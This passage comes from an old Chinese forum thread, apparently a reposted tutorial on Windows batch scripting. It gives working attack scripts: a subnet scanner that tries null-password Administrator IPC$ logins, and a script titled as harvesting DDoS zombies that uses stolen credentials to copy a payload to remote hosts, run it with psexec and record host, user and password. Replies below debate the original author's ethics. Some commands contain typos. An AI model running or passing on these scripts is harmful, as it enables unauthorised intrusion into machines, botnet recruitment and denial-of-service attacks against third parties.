空连接是在没有信任的情况下与服务器建立的会话,换句话说,它是一个到服务器的匿名访问。使用命令net use \IP\ipc$ "" /user:"" 就可以简单地和目标建立一个空连接(需要目标开放IPC$)。利用重定向命令和for命令就可以对一个C类网段进行快速的空连接,并把结果保存到一个文件中供你分析。方法是用记事本编辑如下内容的文件:
@echo off
echo 格式:test *.*.*>test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use %1.%%Gipc$ "" /use:"Administrator" | find "命令完成" >>test.txt
批处理文件保存为.bat,运行即可。这个批处理文件的功能是对你指定的一个C类网段中的254个ip依次试建立帐号为administrator口令为空的ipc$连接,如果成功就把结果记录在test.txt。这样就实现了NT弱口令扫描功能!其中,for命令的功能是对一组文件中的每一个文件执行某个特定命令,也就是可以用你指定的循环范围生成一系列命令。For命令的格式为:FOR %variable IN (set) DO command [command-parameters],具体的含义:
data /t>>123.log
time /t>>123.log
netstat -n -p tcp 10>>123.log
这样不仅可以记录下对方的IP,还有时间和日期,方便自己查看。
8.自动获取DDoS肉鸡
DDoS是Distributed Denial of Service的缩写,意即分布式拒绝服务攻击。它是指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DoS攻击,从而成倍地提高拒绝服务攻击的威力。通常,攻击者使用一个偷窃帐号将DDoS主控程序安装在一个计算机上,在一个设定的时间主控程序将与大量代理程序通讯,代理程序已经被安装在Internet上的许多计算机上。代理程序收到指令时就发动攻击。利用客户/服务器技术,主控程序能在几秒钟内激活成百上千次代理程序的运行。
@echo off
echo自动获取DDoS肉鸡
for /f "tokens=1,3*" %i in (host.txt) do net use \%k\ipc$ /user:"%j"
copy %1 \%i\admin$\sysytem32
if errorelevel 0 goto success
psexec -d \%i c:\winnt\sys_tem(去掉"_")32%1
net user \%i\ipc$ /del
:success
echo ------------------------------>>success.txt
echo 肉鸡:%i>>success.txt
echo 用户名:%j>>success.txt
echo 密码:%k>>success.txt
echo ------------------------------>>success.txt
[ Last edited by 220110 on 2005-11-2 at 22:03 ]作者: 220110 时间: 2005-11-2 21:57
Quote:
Originally posted by Michael at 2005-11-2 21:44:
DOS不是用来干这个的。置疑此贴原作者的道德。
你想得太多了,我想传播的是技术,和丰富我们的论坛。
[ Last edited by 220110 on 2005-11-2 at 22:09 ]作者: Michael 时间: 2005-11-2 22:30 楼主辛苦了.谢谢楼主的热情. 不过我觉得此文在某种程度上暴露了原作者的偷窥欲. 呵呵.作者: 220110 时间: 2005-11-3 07:50 1,我笑,笑可笑之人,挑起这种无谓的事端;
2,尽管说,我愿意“承认”一切人说的一切,但请立刻结束此贴,并请wengier尽快删除(包括转载文章);
3,我将继续“偷窥”,并转入潜水“偷窥”,当我学到东西就走;
4,to michael:我不知你是否昨晚心情不好而致,但请你紧记你的附言:“简单就是美”。作者: Michael 时间: 2005-11-3 18:32 to 220110:
老兄火气真不小,我如此强调是“原作者”而不是楼主,还让你误解。真是抱歉。
不过我看到什么“等肉鸡上门”,“DDOS攻击它人”,就觉得此文“原作者”令人厌恶。
至于我说的“偷窥欲”更是说此文“原作者”了,不知老兄是不理解,还是故意不理解。
[ Last edited by willsort on 2005-11-7 at 19:51 ]作者: lxmxn 时间: 2006-10-21 06:38 先感谢willsort兄的细致的观察和精彩的点评,在阅读这篇帖子的时候,感受到了重定向符在批处理脚本中的实际应用的例子,但对于此文(不针对任何人,只对其内容而言)中出现的一点点错误,还是指点出来。